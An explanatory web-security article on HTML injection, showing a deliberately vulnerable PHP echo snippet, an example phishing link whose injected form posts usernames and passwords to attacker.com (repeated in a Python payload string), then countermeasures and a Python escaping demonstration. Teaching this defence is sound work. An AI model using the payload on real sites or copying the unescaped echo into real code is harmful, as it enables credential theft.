HTML Injection Attack is an attack in which an attacker takes advantage of a security vulnerability in a web application to inject his own HTML content into a webpage, tricking the user into providing sensitive information.
How is an HTML Injection Attack perpetrated?
Let's assume a web application has a security vulnerability. Say it has implemented the following piece of PHP code, which echoes a request parameter straight into the page:

<?php
// The name parameter is taken from the request and echoed without escaping.
$name = $_REQUEST['name'];
?>
<html>
Welcome <?php echo $name ?>!!
</html>
Clearly, this code is vulnerable via the name parameter: whatever markup is supplied there is rendered as part of the page.
Suppose an attacker comes to know about the vulnerability and wants to steal an authenticated user's username and password. He uses some form of social engineering and sends the victim the following link:
/vulnerable.php?name=<h1>Please enter your username and password</h1><form method="POST" action="http://attacker.com/login.php">Username:<input type="text" name="username" /><br>Password:<input type="password" name="password" /><input type="submit" value="Login" /></form><!--
The attacker may also encode the payload as hexadecimal (URL-encoded) characters so that the link is not human readable. The trailing <!-- comments out the rest of the original page, so only the injected form is visible.
The attacker may send this link to the victim in an email claiming it shows some new features of the website. The victim clicks on the link, and a login screen resembling a well-known website appears, asking for a username and password.
When the victim provides his username and password, the data goes directly to the attacker's server, since the injected form posts to attacker.com rather than to the legitimate site.
The attacker can now impersonate the victim and log in to the victim's account with the stolen credentials.
Countermeasures for HTML Injection Attack
We can take a couple of steps to prevent this attack.
- Never insert untrusted data except in a few allowed locations.
- Use HTML escaping before inserting untrusted data into HTML element content.
- Use attribute escaping before inserting untrusted data into common HTML attributes.
- Use JavaScript escaping before inserting untrusted data into JavaScript data values.
- HTML-escape JSON values in an HTML context and read the data with JSON.parse.
- Use CSS escaping and strictly validate data before inserting untrusted data into HTML style property values.
- Use URL escaping before inserting untrusted data into HTML URL parameter values.
- Sanitize HTML markup with a proper library.
- Use the HttpOnly cookie flag.
- Implement a Content Security Policy.
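The following is an added example (not code from the original article) that mirrors the vulnerable PHP snippet in Python and applies the escaping rules from the list above to the page's own injected markup. The payload string, the function names and the crude contains_markup check are constructed for this illustration.

```python
import html
import json
from urllib.parse import quote

# Constructed input: the injected markup from the page's example link,
# as it arrives in the `name` parameter after URL decoding.
PAYLOAD = ('<h1>Please enter your username and password</h1>'
           '<form method="POST" action="http://attacker.com/login.php">'
           'Username:<input type="text" name="username" /><br>'
           'Password:<input type="password" name="password" />'
           '<input type="submit" value="Login" /></form><!--')


def render_vulnerable(name: str) -> str:
    """Mirrors the page's PHP: untrusted data concatenated straight into HTML."""
    return f"<html>Welcome {name}!!</html>"


def render_hardened(name: str) -> str:
    """HTML-escape before inserting into element content.
    The PHP equivalent is htmlspecialchars($name, ENT_QUOTES, 'UTF-8')."""
    return f"<html>Welcome {html.escape(name, quote=True)}!!</html>"


def escape_for_context(value: str, context: str) -> str:
    """Context-aware escaping for the other insertion points in the list."""
    if context == "html":        # element content: escape & < > " '
        return html.escape(value, quote=True)
    if context == "attribute":   # attribute value: escape every non-alphanumeric char
        return "".join(c if c.isalnum() else f"&#x{ord(c):x};" for c in value)
    if context == "js":          # JavaScript string literal: JSON-encode, then hide < >
        return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")
    if context == "url":         # URL query parameter value: percent-encode everything
        return quote(value, safe="")
    raise ValueError(f"unknown context: {context}")


def contains_markup(rendered: str) -> bool:
    """Crude check: does the rendered page still contain a live tag from the payload?"""
    return "<form" in rendered or "<h1>" in rendered


if __name__ == "__main__":
    print("vulnerable:", contains_markup(render_vulnerable(PAYLOAD)))  # True
    print("hardened:  ", contains_markup(render_hardened(PAYLOAD)))    # False
```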
So, beware of the various vulnerabilities in web applications and stay safe, stay secure.